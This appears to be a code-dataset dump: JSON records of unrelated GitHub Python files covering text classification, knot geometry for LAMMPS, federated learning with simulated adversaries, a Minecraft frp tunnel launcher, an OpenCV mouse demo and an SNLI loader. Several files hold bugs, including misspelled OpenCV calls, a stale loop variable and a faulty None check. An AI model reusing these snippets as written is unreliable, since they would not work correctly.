PorterStemmer().stem(token),\n words)));\n\tp = re.compile('[a-zA-Z]+')\n\tfiltered_tokens = list(filter(lambda token:\n p.match(token) and len(token)>=min_length,tokens))\n\treturn filtered_tokens\n\ndef tf_idf(docs):\n\ttfidf = TfidfVectorizer(tokenizer=tokenize, min_df=3,\n max_df=0.90, max_features=3000,\n use_idf=True, sublinear_tf=True,\n norm='l2')\n\ttfidf.fit(docs)\n\treturn tfidf\n\ndef feature_values(doc, representer):\n\tdoc_representation = representer.transform([doc])\n\tfeatures = representer.get_feature_names()\n\treturn [(features[index], doc_representation[0, index])\n for index in doc_representation.nonzero()[1]]\n\ndef main():\n\ttrain_docs = []\n\ttest_docs = []\n\n\tfor doc_id in reuters.fileids():\n\t\tif doc_id.startswith(\"train\"):\n\t\t\ttrain_docs.append(reuters.raw(doc_id))\n\t\telse:\n\t\t\ttest_docs.append(reuters.raw(doc_id))\n\n\trepresenter = tf_idf(train_docs);\n\n\tfor doc in test_docs[:15]:\n\t print(doc_id)\n\t print(feature_values(doc, representer))\n\nif __name__ == '__main__':\n main()\n","repo_name":"tmayn062/CSI4107Search","sub_path":"text_categorization.py","file_name":"text_categorization.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30856353478","text":"\ndef commonChild(s1, s2):\n m, n = len(s1), len(s2)\n prev, cur = [0]*(n+1), [0]*(n+1)\n for i in range(1, m+1):\n for j in range(1, n+1):\n if s1[i-1] == s2[j-1]:\n cur[j] = 1 + prev[j-1]\n else:\n if cur[j-1] > prev[j]:\n cur[j] = cur[j-1]\n else:\n cur[j] = prev[j]\n cur, prev = prev, cur\n return prev[n]\n\n\n# Te traag:\n# def commonChild(s1, s2):\n# matrix = [[\"\" for x in range(len(s2))] for x in range(len(s1))]\n# for i in range(len(s1)):\n# for j in range(len(s2)):\n# if s1[i] == s2[j]:\n# if i == 0 or j == 0:\n# matrix[i][j] = s1[i]\n# else:\n# matrix[i][j] = matrix[i-1][j-1] + s1[i]\n# else:\n# matrix[i][j] = max(matrix[i-1][j], matrix[i][j-1], key=len)\n#\n# cs = matrix[-1][-1]\n#\n# # return len(cs), cs\n# return len(cs)\n\n\n\nif __name__ == '__main__':\n s1 = input()\n s2 = input()\n result = commonChild(s1, s2)\n print(result)\n\n\n\"\"\"\nhttps://www.hackerrank.com/challenges/common-child/problem?h_l=interview&playlist_slugs%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D=strings&h_r=next-challenge&h_v=zen\n\nInput:\nWEWOUCUIDGCGTRMEZEPXZFEJWISRSBBSYXAYDFEJJDLEBVHHKS\nFDAGCXGKCTKWNECHMRXZWMLRYUCOCZHJRRJBOAJOQJZZVUYXIC\n\nOutput: 15\n\nInput:\nHARRY\nSALLY\n\nOutput: 2\n\nInput:\nAA\nBB\nOutput: 0\n\nInput:\nSHINCHAN\nNOHARAAA\n\nOutput: 3\n\nInput:\nABCDEF\nFBDAMN\n\nOutput:\n2\n\nWith this you'll find the longest string which is in both strings.\nSo, without deleting any of the letters that both strings have in common:\n\n matcher = difflib.SequenceMatcher(\n None, s1a, s2a)\n match = matcher.find_longest_match(\n 0, len(s1a), 0, len(s2a))\n return match.size\n\n\"\"\"","repo_name":"dstada/HackerRank.com","sub_path":"Common Child - Interview prep.py","file_name":"Common Child - Interview prep.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37671003021","text":"def check_comm(authors):\n try:\n order = [author.get('commOrder', '0') for author in authors if author.get('isComm', False)]\n order.sort()\n\n flag = True\n for i, val in enumerate(order):\n if int(val) != (i + 1):\n flag = False\n\n return flag\n except Exception as e:\n return False\n","repo_name":"PoorKing95/worktest","sub_path":"polls/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72245915001","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mar 25 2023\nauthor: yjianzhu\n\n\"\"\"\nimport os\nimport sys\nimport numpy as np\nimport pandas as pd\n\n# 对core文件夹下的文件进行处理,生成文件名列表\ndef get_file_list(path):\n file_list = []\n for root, dirs, files in os.walk(path):\n for file in files:\n if os.path.splitext(file)[1] == '.txt':\n file_list.append(os.path.join(root, file))\n return file_list\n\n# 读取文件,返回数据,使用pandas\ndef open_file(file):\n # 读取文件中存的矩阵,分隔符为\\t和空格,无表头\n data = pd.read_csv(file, sep='\\s+', header=None)\n #print(data.values.shape)\n return data.values\n\n# 定义生成环形或者开链 unknot 的函数\ndef unknot_generator(length,type):\n # 生成圆形长度为length的坐标\n if type == \"close\":\n data = np.zeros((length, 3))\n radius = length/2/np.pi\n for i in range(length):\n data[i, 0] = np.cos(2 * np.pi * i / length)*radius\n data[i, 1] = np.sin(2 * np.pi * i / length)*radius\n data[i, 2] = 0\n return data\n # 生成开链长度为length的坐标\n elif type == \"open\":\n data = np.zeros((length, 3))\n # 用折线生成开链\n for i in range(length):\n data[i, 0] = 0\n data[i, 1] = 0\n data[i, 2] = i\n return data\n\n\n\n# 定义生成更长纽结的函数,输入data为numpy数组,拓展长度至length\ndef knot_generator(data, length,type=\"open\",mod=\"MC\"):\n \"\"\"生成开链or闭链纽结\"\"\"\n N = data.shape[0]\n\n # 生成开链纽结\n if type == \"open\":\n # 在链前后各添加(length-N)/2个坐标,链前从z轴负方向想data[0]靠近,链后从data[N-1]向z轴正方向靠近\n for i in range(int((length - N) / 2)):\n data = np.insert(data, 0, np.array([0, 0, -1])+data[0,:], axis=0)\n data = np.insert(data, N + 2*i + 1, np.array([0, 0, 1])+data[N+2*i,:], axis=0)\n return data\n # 生成闭链纽结\n elif type == \"close\":\n # 生成旋转矩阵,使得data[-1,:]与z轴正方向重合\n # 平移矩阵,使得data[0,:]与原点重合\n data-=data[0,:]\n\n vec=data[-1,:]\n xvec=vec/np.linalg.norm(vec)\n #找和vec与z轴正方向垂直的旋转轴\n dx = xvec[0]\n dy = xvec[1]\n dz = xvec[2]\n cosa = dz\n sina = np.sqrt(1-cosa*cosa)\n rxy = np.sqrt(dx*dx + dy*dy)\n ux = -dy/rxy\n uy = dx/rxy\n\n R=np.zeros((3,3))\n R[0,0] = cosa + ux * ux * (1-cosa)\n R[0,1] = ux * uy * (1-cosa) \n R[0,2] = uy * sina\n R[1,0] = uy * ux *(1-cosa) \n R[1,1] = cosa + uy*uy*(1-cosa)\n R[1,2] = - ux*sina\n R[2,0] = - uy*sina\n R[2,1] = ux*sina\n R[2,2] = cosa\n\n data=np.dot(data,R)\n \n if(mod==\"MC\"):\n # 在y轴上找一个点,这个点距离data[0,:]和data[-1,:]相等\n if((length-N)%2==0):\n x_0=np.sqrt(((length-N)/2)**2-(data[-1,2]/2-0.5)**2)\n y_0=0\n z_0=0.5+data[-1,2]/2\n\n # 在x0,y0,z0和data[-1,:]的距离输出\n #print(np.linalg.norm(data[-1,:]-np.array([x_0,y_0,z_0])))\n # 在x0,y0,z0和data[-1,:]之间间隔距离1取点\n newv=np.array([x_0,y_0,z_0])-data[-1,:]\n newv=newv/np.linalg.norm(newv)\n\n for i in range(int((length-N)/2)):\n data=np.insert(data,N+i,data[-1,:]+newv,axis=0)\n # 再次在\n z_0=-0.5+data[N-1,2]/2\n newv=np.array([x_0,y_0,z_0])-data[0,:]\n newv=newv/np.linalg.norm(newv)\n for i in range(int((length-N)/2)):\n data=np.insert(data,0,data[0,:]+newv,axis=0)\n return data\n else:\n half=(length-N)//2\n x_0=np.sqrt((half+1)**2-(data[-1,2]/2)**2)\n y_0=0\n z_0=data[-1,2]/2\n vec=np.array([x_0,y_0,z_0])-data[-1,:]\n vec=vec/np.linalg.norm(vec)\n for i in range(half):\n data=np.insert(data,N+i,data[-1,:]+vec,axis=0)\n vec=np.array([x_0,y_0,z_0])-data[0,:]\n vec=vec/np.linalg.norm(vec)\n for i in range(half+1):\n data=np.insert(data,0,data[0,:]+vec,axis=0)\n\n return data\n else:\n return \n\n# 定义写入xyz文件的函数\ndef write_xyz(data, filename):\n N = data.shape[0]\n with open(filename, 'w') as f:\n f.write(str(N) + '\\n\\n')\n for i in range(N):\n f.write('1' + '\\t' + str(data[i, 0]) + '\\t' + str(data[i, 1]) + '\\t' + str(data[i, 2]) + '\\n')\n\n# 定义计算相邻两点间距离的函数\ndef distance(data, type=\"open\"):\n if(type==\"open\"):\n N = data.shape[0]\n dis = np.zeros(N-1)\n for i in range(1,N):\n dis[i-1] = np.linalg.norm(data[i, :] - data[i - 1, :])\n return dis\n elif(type==\"close\"):\n N = data.shape[0]\n dis = np.zeros(N)\n for i in range(1,N):\n dis[i-1] = np.linalg.norm(data[i, :] - data[i - 1, :])\n dis[N-1]=np.linalg.norm(data[0,:]-data[N-1,:])\n return dis\n\n# 定义保存为lammps input格式的函数\ndef write_lammps(data,filename,type=\"open\",Lx=200,Ly=200,Lz=200):\n N=data.shape[0]\n with open(filename,'w') as f:\n f.write(\"#LAMMPS input file\\n\")\n f.write('{} atoms\\n'.format(N))\n # 写入bond数目\n if (type==\"open\"):\n f.write('{} bonds\\n'.format(N-1))\n elif(type==\"close\"):\n f.write('{} bonds\\n'.format(N))\n # 写入angle数目\n if (type==\"open\"):\n f.write('{} angles\\n'.format(N-2))\n elif(type==\"close\"):\n f.write('{} angles\\n'.format(N))\n\n # 写入原子类型数目\n f.write('\\n1 atom types\\n')\n # 写入bond类型数目\n f.write('1 bond types\\n')\n # 写入angle类型数目\n f.write('1 angle types\\n')\n\n # 写入box的大小\n min_x=np.min(data[:,0])\n data[:,0] = data[:,0] - min_x\n min_y=np.min(data[:,1])\n data[:,1] = data[:,1] - min_y\n min_z=np.min(data[:,2])\n data[:,2] = data[:,2] - min_z\n f.write('\\n0.0 {} xlo xhi\\n'.format(max(Lx,np.max(data[:,0]))))\n f.write('0.0 {} ylo yhi\\n'.format(max(Ly,np.max(data[:,1]))))\n f.write('0.0 {} zlo zhi\\n'.format(max(Lz,np.max(data[:,2]))))\n\n # 写入质量\n f.write('\\nMasses\\n\\n1 1.0\\n')\n\n # 写入原子坐标\n f.write('\\nAtoms\\n\\n')\n for i in range(N):\n f.write('{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n'.format(i+1,1,1,data[i,0],data[i,1],data[i,2]))\n # 写入bond信息\n f.write('\\nBonds\\n\\n')\n if (type==\"open\"):\n for i in range(N-1):\n f.write('{}\\t{}\\t{}\\t{}\\n'.format(i+1,1,i+1,i+2))\n elif(type==\"close\"):\n for i in range(N-1):\n f.write('{}\\t{}\\t{}\\t{}\\n'.format(i+1,1,i+1,i+2))\n f.write('{}\\t{}\\t{}\\t{}\\n'.format(N,1,N,1))\n # 写入angle信息\n f.write('\\nAngles\\n\\n')\n if (type==\"open\"):\n for i in range(N-2):\n f.write('{}\\t{}\\t{}\\t{}\\t{}\\n'.format(i+1,1,i+1,i+2,i+3))\n elif(type==\"close\"):\n for i in range(N-2):\n f.write('{}\\t{}\\t{}\\t{}\\t{}\\n'.format(i+1,1,i+1,i+2,i+3))\n f.write('{}\\t{}\\t{}\\t{}\\t{}\\n'.format(N-1,1,N-1,N,1))\n f.write('{}\\t{}\\t{}\\t{}\\t{}\\n'.format(N,1,N,1,2))\n\n# 定义读取xyz文件的函数\ndef read_xyz(filename):\n with open(filename,'r') as f:\n N=int(f.readline())\n f.readline()\n data=np.zeros((N,3))\n for i in range(N):\n line=f.readline().split()\n data[i,0]=float(line[1])\n data[i,1]=float(line[2])\n data[i,2]=float(line[3])\n return data\n\n\nif __name__ == '__main__':\n data = unknot_generator(300,type=\"close\")\n dis = distance(data,type=\"close\")\n print(max(dis),min(dis),np.mean(dis))\n write_lammps(data,\"unknot_L300_close.data\",type=\"close\")\n # knot_cores=get_file_list(\"core\")\n # types=\"close\"\n # Lknot=300\n\n # for knot in knot_cores:\n # data=open_file(knot)\n # data=knot_generator(data,Lknot,types)\n # # 从文件名中提取纽结类型\n # knot_type=knot.split(\"_\")[1]\n # knot_type=knot_type.split(\".\")[0]\n # write_lammps(data,\"lammps/{}_L{}_{}.data\".format(knot_type,data.shape[0],types),type=types)","repo_name":"yjianzhu/knot-generator","sub_path":"src/knot_generator.py","file_name":"knot_generator.py","file_ext":"py","file_size_in_byte":8725,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"10994259656","text":"\"\"\"\nOnline status\n=============\nThe module that provides functionality for online status checking.\n\"\"\"\nfrom utils.redishelper import REDIS_HELPER\n\n\nclass OnlineStatusMiddleware(): # pylint: disable=too-few-public-methods\n \"\"\"\n The class that represents logic for setting user id in redis db\n \"\"\"\n\n def __init__(self, get_response):\n \"\"\"Constructor method that creates middleware instance.\"\"\"\n\n self.get_response = get_response\n\n def __call__(self, request):\n \"\"\"\n Method that makes middleware instance callable and implements setting user id in redis db\n \"\"\"\n user = request.user\n if user.is_authenticated():\n REDIS_HELPER.set(user.id, user.email)\n response = self.get_response(request)\n return response\n","repo_name":"lv275python/eventually.api","sub_path":"eventually/middlewares/onlinestatus.py","file_name":"onlinestatus.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"31120820833","text":"caminho_arquivo_inexistente = '03-arquivo-inexistente.txt'\ncaminho_arquivo_existente = '03-exercicio-leitura-notas.txt'\ncaminho_arquivo_pessoas_reprovadas = '03-exercicio-pessoas_reprovadas.txt'\n\ndef carregar_arquivos_notas(caminho_arquivo):\n pessoas = []\n \n try:\n with open(caminho_arquivo) as conteudo:\n pessoas = conteudo.readlines()\n except FileNotFoundError:\n print(f\":: ERROR :: Não foi possível encontrar o arquivo: {caminho_arquivo}\")\n return None\n \n return pessoas\n\ndef escrever_arquivo(caminho, conteudo):\n try:\n with open(caminho, 'w') as arquivo:\n arquivo.writelines(conteudo)\n except:\n print(f\":: ERROR :: Arquivo {caminho} não pode ser salvo!\")\n return\n \n print(f\"Arquivo {caminho} salvo com sucesso!\")\n\n\ndef filtro_pessoas_reprovadas(pessoas):\n if pessoas == None:\n raise ValueError(\"Lista de pessoas esta vazia\")\n\n pessoas_reprovadas = []\n for pessoa in pessoas:\n nome, nota = pessoa.replace(\"\\n\", \"\").split(\" \")\n if int(nota) < 6:\n pessoas_reprovadas.append(nome + \"\\n\")\n \n return pessoas_reprovadas\n\ndef processar_pessoas_reprovadas(caminho_arquivo):\n try:\n notas1 = carregar_arquivos_notas(caminho_arquivo)\n pessoas_reprovadas1 = filtro_pessoas_reprovadas(notas1)\n escrever_arquivo(caminho_arquivo_pessoas_reprovadas, pessoas_reprovadas1) \n except ValueError as error_message:\n print(f\"{error_message}\")\n \n print(\"\")\n\nprocessar_pessoas_reprovadas(caminho_arquivo_inexistente)\nprocessar_pessoas_reprovadas(caminho_arquivo_existente)\nprint(\"Fim!\", end=\"\\n\")\n","repo_name":"UelioNobre/testes-com-python","sub_path":"02-entrada-e-saida-de-dados/03-exercicio-leitura-notas.py","file_name":"03-exercicio-leitura-notas.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7189687664","text":"\"\"\"\n@author: Julian Sobott\n@created: 18.12.2018\n@brief:\n@description:\n\n@external_use:\n\n@internal_use:\n\n\"\"\"\nimport sys\nimport subprocess\n\nfrom Logging import logger\nimport Paths\n\nfrom CMD import intersects, get_optional_parameter\n\n\nDESCRIPTION = (\n \"\\n\"\n \"Custom.py Init:\\n\"\n \"This script makes it possible to use custom scripts.\\n\"\n \"Add your functionality to your Custom.py file.\\n\"\n \"Append your additional arguments to this call.\\n\"\n \"Only {additional_args} are forwarded to the custom script.\\n\"\n \" req -c {additional_args}\"\n \"\\n\"\n )\n\n\ndef handle_sys_arguments(all_args):\n help_arg = [\"--help\", \"-h\", \"?\"]\n if intersects(help_arg, all_args) or len(all_args) <= 1:\n print_help()\n exit(0)\n\n custom_args = [Paths.Website.ABS_CUSTOM_SCRIPT_PATH]\n custom_args += all_args[1:]\n subprocess.run(custom_args, shell=True)\n\n\ndef print_help():\n print(DESCRIPTION)\n\n\nif __name__ == \"__main__\":\n p_num_args = len(sys.argv) - 1\n p_all_args = []\n if p_num_args > 0:\n p_all_args = sys.argv[1:]\n handle_sys_arguments(p_all_args)\n","repo_name":"JulianSobott/Website_creator","sub_path":"scripts/Custom.py","file_name":"Custom.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22652966983","text":"import psutil\r\nimport subprocess\r\nimport os\r\nimport pyperclip\r\nimport random\r\nimport requests\r\n\r\ndef get(url, *args, **kwargs):\r\n try:\r\n return requests.get(url, *args, **kwargs)\r\n except Exception as e:\r\n print('请求失败: {}'.format(e))\r\n return None\r\n\r\nprint('公告信息')\r\nprint('--------------------------------------------------------')\r\nurl = 'http://api.lmbaka.top:114/frp/information'\r\nresponse = get(url)\r\nif response and response.status_code == 200:\r\n print(response.text)\r\nelse:\r\n print('请求失败,无法获取公告信息')\r\nprint('--------------------------------------------------------')\r\nprint('正在寻找Minecraft开放的端口...')\r\ndef get_open_ports():\r\n all_processes = psutil.process_iter()\r\n open_ports = set() # 集合存端口\r\n\r\n for process in all_processes:\r\n try:\r\n if process.name() == \"javaw.exe\":\r\n process_connections = process.connections()\r\n\r\n for conn in process_connections:\r\n if conn.status == 'LISTEN':\r\n open_ports.add(conn.laddr.port) # 防重\r\n\r\n except (psutil.Error, psutil.NoSuchProcess):\r\n pass\r\n\r\n return open_ports\r\n\r\ndef input_port(desc: str, error_desc: str, start: int=0, end: int=65535):\r\n while (True):\r\n try:\r\n port = int(input(desc))\r\n if not (start <= port <= end):\r\n print(error_desc)\r\n continue\r\n return port\r\n except ValueError: # 输入内容无法转为 int\r\n print(error_desc)\r\n continue\r\n\r\ndef start_frpc(minecraft_port, external_port):\r\n # 清除 frpc.ini 文件内容\r\n with open(\"frpc.ini\", mode=\"w\") as f:\r\n f.write(\"[common]\\n\")\r\n f.write(\"server_addr = gyfrp.lmbaka.top\\n\")\r\n f.write(\"server_port = 54001\\n\")\r\n\r\n name = \"tunnel\" + str(os.urandom(4).hex().upper())\r\n\r\n # 构建 frpc.ini 配置文件内容\r\n frpc_ini = f\"\"\"[tunnel_{name}]\r\ntype = tcp\r\nlocal_ip = 127.0.0.1\r\nlocal_port = {minecraft_port}\r\nremote_port = {external_port}\r\n\"\"\"\r\n\r\n with open(\"frpc.ini\", mode=\"a\") as f:\r\n f.write(frpc_ini)\r\n\r\n # 启动 frpc\r\n frpc_process = subprocess.Popen(\r\n [\"frpc\", \"-c\", \"frpc.ini\"],\r\n stdout=subprocess.PIPE,\r\n stderr=subprocess.STDOUT\r\n )\r\n target_address = f\"frp.lmbaka.top:{external_port}\"\r\n print('__________________________________________________________')\r\n print('IP:'+target_address+' 已复制到剪贴板')\r\n print(f\"使用 frp.lmbaka.top:{external_port} 登入房间\")\r\n pyperclip.copy(target_address)\r\n # 输出日志信息到控制台\r\n for line in iter(frpc_process.stdout.readline, b''):\r\n print(line.decode('utf-8').strip())\r\n\r\n\r\nopen_ports = get_open_ports()\r\n\r\nif len(open_ports) == 1:\r\n for port in open_ports:\r\n print('检测到Minecraft开放端口:'+str(port))\r\n ranport = random.randint(54000, 55000)\r\n start_frpc(port, ranport)\r\nelse:\r\n print(\"未找到Minecraft的开放端口或者有多个不同端口,你需要手动输入端口号\")\r\n minecraft_port = input_port(\"请输入 Minecraft 端口号:\", \"您输入的端口号有误, 请重新输入\")\r\n external_port = input_port(\"请输入外部端口号, 应当为 54000-55000 的整数:\", \"您输入的端口号有误, 请重新输入\", 54000, 55000)\r\n ranport = random.randint(54000, 55000)\r\n start_frpc(minecraft_port, ranport)\r\n","repo_name":"Lmbaka/McFrp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"28461021461","text":"# @Author: Varoon Pazhyanur \n# @Date: 15-08-2017\n# @Filename: mouse_events.py\n# @Last modified by: varoon\n# @Last modified time: 15-08-2017\n\n\n\nimport cv2\nimport numpy\n\n#Mouse handler function\ndef draw_circle(event, x,y, flags, param):\n if(event==cv2.EVENT_LBOTTONDLCLK):\n cv2.circle(image, (x,y),100,(255,255,0),-1)\n#make black image\nimage = numpy.zeros((512,512,3),numpy.uint32)\ncv2.namedWindow(\"WINDOW NAME\")\ncv2.setMouseCallback('WINDOW NAME', draw_circle)\nwhile(True):\n cv2.imshow('WINDOW NAME', image)\n if(cv2.waitkey(20) & 0xFF==27):\n break\ncv2.destroyAllWindows\n","repo_name":"varoonp123/Learning_OpenCV","sub_path":"mouse_events.py","file_name":"mouse_events.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"22279148511","text":"import math\nimport random\nfrom copy import deepcopy\nfrom typing import List, Any, Dict\n\nfrom metrics.accuracy_metric import AccuracyMetric\nfrom metrics.test_loss_metric import TestLossMetric\nfrom tasks.fl.fl_user import FLUser\nimport torch\nimport logging\nfrom torch.nn import Module\n\nfrom tasks.task import Task\nlogger = logging.getLogger('logger')\n\n\nclass FederatedLearningTask(Task):\n fl_train_loaders: List[Any] = None\n ignored_weights = ['num_batches_tracked']#['tracked', 'running']\n adversaries: List[int] = None\n\n def init_task(self):\n self.load_data()\n self.model = self.build_model()\n self.resume_model()\n self.model = self.model.to(self.params.device)\n\n self.local_model = self.build_model().to(self.params.device)\n self.criterion = self.make_criterion()\n self.adversaries = self.sample_adversaries()\n\n self.metrics = [AccuracyMetric(), TestLossMetric(self.criterion)]\n self.set_input_shape()\n return\n\n def get_empty_accumulator(self):\n weight_accumulator = dict()\n for name, data in self.model.state_dict().items():\n weight_accumulator[name] = torch.zeros_like(data)\n return weight_accumulator\n\n def sample_users_for_round(self, epoch) -> List[FLUser]:\n sampled_ids = random.sample(\n range(self.params.fl_total_participants),\n self.params.fl_no_models)\n sampled_users = []\n for pos, user_id in enumerate(sampled_ids):\n train_loader = self.fl_train_loaders[user_id]\n compromised = self.check_user_compromised(epoch, pos, user_id)\n user = FLUser(user_id, compromised=compromised,\n train_loader=train_loader)\n sampled_users.append(user)\n\n return sampled_users\n\n def check_user_compromised(self, epoch, pos, user_id):\n \"\"\"Check if the sampled user is compromised for the attack.\n\n If single_epoch_attack is defined (eg not None) then ignore\n :param epoch:\n :param pos:\n :param user_id:\n :return:\n \"\"\"\n compromised = False\n if self.params.fl_single_epoch_attack is not None:\n if epoch == self.params.fl_single_epoch_attack:\n if pos < self.params.fl_number_of_adversaries:\n compromised = True\n logger.warning(f'Attacking once at epoch {epoch}. Compromised'\n f' user: {user_id}.')\n else:\n compromised = user_id in self.adversaries\n return compromised\n\n def sample_adversaries(self) -> List[int]:\n adversaries_ids = []\n if self.params.fl_number_of_adversaries == 0:\n logger.warning(f'Running vanilla FL, no attack.')\n elif self.params.fl_single_epoch_attack is None:\n adversaries_ids = random.sample(\n range(self.params.fl_total_participants),\n self.params.fl_number_of_adversaries)\n logger.warning(f'Attacking over multiple epochs with following '\n f'users compromised: {adversaries_ids}.')\n else:\n logger.warning(f'Attack only on epoch: '\n f'{self.params.fl_single_epoch_attack} with '\n f'{self.params.fl_number_of_adversaries} compromised'\n f' users.')\n\n return adversaries_ids\n def get_model_optimizer(self, model):\n local_model = deepcopy(model)\n local_model = local_model.to(self.params.device)\n\n optimizer = self.make_optimizer(local_model)\n\n return local_model, optimizer\n\n def copy_params(self, global_model, local_model):\n local_state = local_model.state_dict()\n for name, param in global_model.state_dict().items():\n if name in local_state and name not in self.ignored_weights:\n local_state[name].copy_(param)\n\n def get_fl_update(self, local_model, global_model) -> Dict[str, torch.Tensor]:\n local_update = dict()\n for name, data in local_model.state_dict().items():\n if self.check_ignored_weights(name):\n continue\n local_update[name] = (data - global_model.state_dict()[name])\n\n return local_update\n\n def accumulate_weights(self, weight_accumulator, local_update):\n update_norm = self.get_update_norm(local_update)\n for name, value in local_update.items():\n self.dp_clip(value, update_norm)\n weight_accumulator[name].add_(value)\n\n def update_global_model(self, weight_accumulator, global_model: Module):\n for name, sum_update in weight_accumulator.items():\n if self.check_ignored_weights(name):\n continue\n scale = self.params.fl_eta / self.params.fl_total_participants\n average_update = scale * sum_update\n self.dp_add_noise(average_update)\n model_weight = global_model.state_dict()[name]\n model_weight.add_(average_update)\n\n def dp_clip(self, local_update_tensor: torch.Tensor, update_norm):\n if self.params.fl_diff_privacy and \\\n update_norm > self.params.fl_dp_clip:\n norm_scale = self.params.fl_dp_clip / update_norm\n local_update_tensor.mul_(norm_scale)\n\n def dp_add_noise(self, sum_update_tensor: torch.Tensor):\n if self.params.fl_diff_privacy:\n noised_layer = torch.FloatTensor(sum_update_tensor.shape)\n noised_layer = noised_layer.to(self.params.device)\n noised_layer.normal_(mean=0, std=self.params.fl_dp_noise)\n sum_update_tensor.add_(noised_layer)\n\n def get_update_norm(self, local_update):\n squared_sum = 0\n for name, value in local_update.items():\n if self.check_ignored_weights(name):\n continue\n squared_sum += torch.sum(torch.pow(value, 2)).item()\n update_norm = math.sqrt(squared_sum)\n return update_norm\n\n def check_ignored_weights(self, name) -> bool:\n for ignored in self.ignored_weights:\n if ignored in name:\n return True\n\n return False\n","repo_name":"ebagdasa/backdoors101","sub_path":"tasks/fl/fl_task.py","file_name":"fl_task.py","file_ext":"py","file_size_in_byte":6193,"program_lang":"python","lang":"en","doc_type":"code","stars":289,"dataset":"github-code","pt":"40"} +{"seq_id":"14842304577","text":"from setuptools import setup\nimport os\n\n\ndef get_version(path):\n fn = os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n path, \"__init__.py\")\n with open(fn) as f:\n for line in f:\n if '__version__' in line:\n parts = line.split(\"=\")\n return parts[1].split(\"'\")[1]\n\n\nhere = os.path.abspath(os.path.dirname(__file__))\nREADME = open(os.path.join(here, 'README.rst')).read()\nCHANGELOG = open(os.path.join(here, 'CHANGELOG.rst')).read()\n\n\nsetup(\n name=\"devpi-fallback\",\n description=\"devpi-fallback: Make devpi-server fallback to another index\",\n long_description=README + \"\\n\\n\" + CHANGELOG,\n url=\"https://github.com/msabramo/devpi-fallback\",\n version=get_version(\"devpi_fallback\"),\n maintainer=\"Marc Abramowitz\",\n maintainer_email=\"msabramo@gmail.com\",\n license=\"MIT\",\n classifiers=[\n \"Environment :: Web Environment\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\"] + [\n \"Programming Language :: Python :: %s\" % x\n for x in \"2 3 2.7 3.4\".split()],\n entry_points={\n 'devpi_server': [\n \"devpi-fallback = devpi_fallback.main\"]},\n install_requires=[\n 'devpi-server>=2.0.0'],\n include_package_data=True,\n zip_safe=False,\n packages=['devpi_fallback'])\n","repo_name":"msabramo/devpi-fallback","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18819076769","text":"from importlib.resources import path\nimport itertools\nimport json\nimport gzip\nimport numpy\n\nLABELS = {\n 'contradiction': 0,\n 'neutral': 1,\n 'entailment': 2}\n\n\nTYPES = ['train', 'test', 'dev']\n\n\ndef extract_tokens_from_binary_parse(parse):\n return parse.replace('(', ' ').replace(')', ' ').replace('-LRB-', '(').replace('-RRB-', ')').split()\n\n\ndef read_file(filename, skip_no_majority=True):\n with path(__name__, filename) as file, gzip.open(file, 'rt') as lines:\n for line in lines:\n data = json.loads(line)\n label = data['gold_label']\n s1 = ' '.join(extract_tokens_from_binary_parse(data['sentence1_binary_parse']))\n s2 = ' '.join(extract_tokens_from_binary_parse(data['sentence2_binary_parse']))\n if skip_no_majority and label == '-':\n continue\n yield (s1, s2, label)\n\ndef get_data(filename, limit=None):\n lefts, rights, labels = zip(*itertools.islice(read_file(filename), limit))\n from keras.utils import np_utils\n Y = numpy.array([LABELS[l] for l in labels])\n Y = np_utils.to_categorical(Y, len(LABELS))\n return lefts, rights, Y\n\n\ndef get(type):\n return get_data('snli_1.0_{}.jsonl.gz'.format(type))\n","repo_name":"Unipisa/DSMs-evaluation","sub_path":"Extrinsic-Evaluation/exeval/snli/data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"22283721515","text":"#!/usr/bin/env python3\n\n\"\"\"\nThe basic idea is that we iterate through the input array and mark elements\nas negative using nums[nums[i] -1] = -nums[nums[i]-1]. In this way all the\nnumbers that we have seen will be marked as negative. In the second iteration,\nif a value is not marked as negative, it implies we have never seen that index\nbefore, so just add it to the return list.\n\"\"\"\n\n\"\"\"\nThe idea here is to iterate thru the input array and mark:\n\nnums[nums[i] - 1] = -nums[nums[i]-1]\n\ni.e. the VALUE at that index - 1, make it negative\n\nNow nums will be transformed to have negative numbers at indexes in which\nthe value exists. When you iterate a second time, if you see a postivie number\nAt that index, so you can just push i + 1 into the result array\n\nA. Iterate thru array. For each number mark nums[nums[i] - 1] to be negative\nB. Then iterate thru array, if you see a number larger than 0, append whatever\nindex it is at to result array\n\"\"\"\n\n\nfrom typing import List\nimport unittest\n\n\ndef find_all_numbers_not_in_array(alist: List[int]) -> List[int]:\n res = []\n if List is None:\n return []\n for n in 